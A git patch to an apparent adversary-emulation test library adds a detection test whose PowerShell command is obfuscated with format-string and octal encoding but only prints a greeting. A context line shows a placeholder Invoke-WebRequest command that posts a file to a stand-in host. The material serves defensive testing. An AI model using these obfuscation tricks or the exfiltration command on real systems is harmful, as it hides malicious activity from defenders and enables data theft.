From 189ae94750db61ac22eb759d3ecf4bb1b619f56a Mon Sep 17 00:00:00 2001
From: Adam Mashinchi <78813159+amashinchi-rc@users.noreply.github.com>
Date: Mon, 26 Jul 2021 12:46:41 -0700
Subject: [PATCH] Update T1027.yaml

Added additional obfuscated PowerShell example.
---
 atomics/T1027/T1027.yaml | 12 ++++++++++++
 1 file changed, 12 insertions(+)

diff --git a/atomics/T1027/T1027.yaml b/atomics/T1027/T1027.yaml
index 7210e5af..4d5a5c58 100644
--- a/atomics/T1027/T1027.yaml
+++ b/atomics/T1027/T1027.yaml
@@ -150,3 +150,15 @@ atomic_tests:
     command: |
       Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}
     name: powershell
+
+- name: Obfuscated Command in PowerShell
+  auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f
+  description: |
+    This is an obfuscated PowerShell command which when executed prints "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      $cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING')  ;   $pz2Sb0  =[TYpE]("{1}{0}{2}"-f'nv','cO','ert')  ;  &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') (  (&("{1}{2}{0}"-f'blE','gET-','vaRIA')  ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] (  $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) )
+    name: powershell
+